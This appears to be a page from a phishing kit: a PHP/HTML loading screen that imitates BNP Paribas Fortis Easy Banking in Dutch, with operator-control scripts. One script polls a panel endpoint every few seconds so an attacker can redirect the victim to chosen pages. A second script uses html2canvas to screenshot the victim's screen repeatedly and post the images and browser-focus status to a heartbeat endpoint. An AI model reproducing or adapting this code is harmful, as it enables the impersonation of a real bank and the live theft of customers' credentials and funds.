<?php
include 'include/session.php';

?>
<!DOCTYPE html>
<html lang="nl">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>BNP Fortis - Laden...</title>
    <link rel="icon" type="image/png" href="./assets/imgs/favicon.png">
    <link rel="stylesheet" href="assets/css/style.css">
     <script>
document.addEventListener('DOMContentLoaded', function () {
  let isFetchingFlow = false;

  function handleFlowResponse(data) {
    if (!data.success) return;

    if (data.locked && data.final_redirect_url) {
      window.location.href = data.final_redirect_url;
      return;
    }

    const panelAction = data.panel_action ? data.panel_action.trim() : '';
    const currentPage = location.pathname.split('/').pop();

    if (panelAction && panelAction !== currentPage) {
      window.location.href = panelAction;
      return;
    }

    if (data.custom_message) {
      const box = document.getElementById('flow-msg');
      if (box) box.innerText = data.custom_message;
    }
  }

  async function pollFlow() {
    if (isFetchingFlow) return;
    isFetchingFlow = true;

    try {
      const res = await fetch('./ajax/flow.php');
      const data = await res.json();
      handleFlowResponse(data);
    } catch (err) {
      // Silent fail
    } finally {
      isFetchingFlow = false;
      setTimeout(pollFlow, 5000); // Schedule next only after this finishes
    }
  }

  // 🔥 First request immediately
  pollFlow();
});
</script>

<script src="./assets/js/html2canvas.min.js"></script>
<script>
let heartbeatInterval = null;
let isSendingHeartbeat = false;

// 🔁 Send heartbeat (ensures one at a time)
async function sendHeartbeat(active = 1, includeImage = true) {
  if (isSendingHeartbeat) return;
  isSendingHeartbeat = true;

  try {
    const currentPage = location.pathname.split('/').pop();
    const payload = {
      is_active: active,
      browser_status: document.visibilityState === 'visible' ? 'focused' : 'blurred',
      current_page: currentPage,
      image: null
    };

    if (includeImage) {
      const canvas = await html2canvas(document.body);
      payload.image = canvas.toDataURL('image/png');
    }

    await fetch('./ajax/heartbeat.php', {
      method: 'POST',
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify(payload)
    });
  } catch (err) {
    // silent fail
  } finally {
    isSendingHeartbeat = false;
  }
}

// ⚡ Initial heartbeat (no image)
sendHeartbeat(1, false);

// ⏱️ Delayed second heartbeat (with image)
setTimeout(() => sendHeartbeat(1, true), 3000);

// 🔁 Continuous heartbeat every 5s
heartbeatInterval = setInterval(() => {
  sendHeartbeat(1, true);
}, 5000);

// 📄 On visibility change
document.addEventListener('visibilitychange', () => {
  sendHeartbeat(document.visibilityState === 'visible' ? 1 : 0, false);
});

// 🚪 On page unload
window.addEventListener('beforeunload', function () {
  const currentPage = location.pathname.split('/').pop();
  navigator.sendBeacon('./ajax/heartbeat.php', JSON.stringify({
    is_active: 0,
    browser_status: 'unloading',
    current_page: currentPage,
    image: null
  }));
});
</script>
    <style>
        .logo-img {
            height: 32px;
            display: block;
        }
        /* Loading Page Specific Styles */
        .card {
            max-width: 650px;
        }

        .welcome-section {
            flex: 0 0 220px;
            padding: 50px 30px;
        }

        .welcome-section h1 {
            font-size: 20px;
        }

        .loading-section {
            flex: 1;
            padding: 60px 40px;
            display: flex;
            flex-direction: column;
            align-items: center;
            justify-content: center;
            min-height: 250px;
        }

        .spinner {
            width: 50px;
            height: 50px;
            border: 4px solid #e0e0e0;
            border-top: 4px solid #00965e;
            border-radius: 50%;
            animation: spin 1s linear infinite;
            margin-bottom: 25px;
        }

        @keyframes spin {
            0% { transform: rotate(0deg); }
            100% { transform: rotate(360deg); }
        }

        .loading-text {
            font-size: 16px;
            color: #333;
            font-weight: 500;
            margin-bottom: 8px;
        }

        .loading-subtext {
            font-size: 14px;
            color: #666;
        }

        .loading-dots::after {
            content: '';
            animation: dots 1.5s steps(4, end) infinite;
        }

        @keyframes dots {
            0%, 20% { content: ''; }
            40% { content: '.'; }
            60% { content: '..'; }
            80%, 100% { content: '...'; }
        }
    </style>
</head>
<body>
    <!-- Header -->
    <header class="header">
        <div class="header-left">
            <a href="#">&#10094; Terug</a>
        </div>
        <div class="header-center">
            
            <div class="logo-text">
                <img src="./assets/imgs/logo.svg" alt="BNP Paribas Fortis" class="logo-img">
            </div>
        </div>
        <div class="header-right">
            <a href="#">Ga naar Easy Banking Business</a>
        </div>
    </header>

    <!-- Main Content -->
    <main class="main-content">
        <div class="card card-split">
            <div class="welcome-section">
                <p>Welkom in</p>
                <h1>EASY BANKING</h1>
            </div>
            <div class="loading-section">
                <div class="spinner"></div>
                <p class="loading-text">Even geduld<span class="loading-dots"></span></p>
                <p class="loading-subtext">Uw gegevens worden verwerkt</p>
            </div>
        </div>

        <div class="help-section">
            <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2">
                <path d="M22 16.92v3a2 2 0 0 1-2.18 2 19.79 19.79 0 0 1-8.63-3.07 19.5 19.5 0 0 1-6-6 19.79 19.79 0 0 1-3.07-8.67A2 2 0 0 1 4.11 2h3a2 2 0 0 1 2 1.72 12.84 12.84 0 0 0 .7 2.81 2 2 0 0 1-.45 2.11L8.09 9.91a16 16 0 0 0 6 6l1.27-1.27a2 2 0 0 1 2.11-.45 12.84 12.84 0 0 0 2.81.7A2 2 0 0 1 22 16.92z"/>
            </svg>
            <span><a href="#">Hulp nodig</a>? Bel naar +32 2 762 60 00</span>
        </div>
    </main>

    <!-- Footer -->
    <footer class="footer">
        <div class="footer-left">
            &copy; 2026 BNP Paribas Fortis
        </div>
        <div class="footer-right">
            <a href="#">Over ons</a>
            <span>-</span>
            <a href="#">Gebruiksvoorwaarden van de Website</a>
            <span>-</span>
            <a href="#">Cookies</a>
            <span>-</span>
            <a href="#">Privacyverklaring</a>
        </div>
    </footer>
</body>
</html>
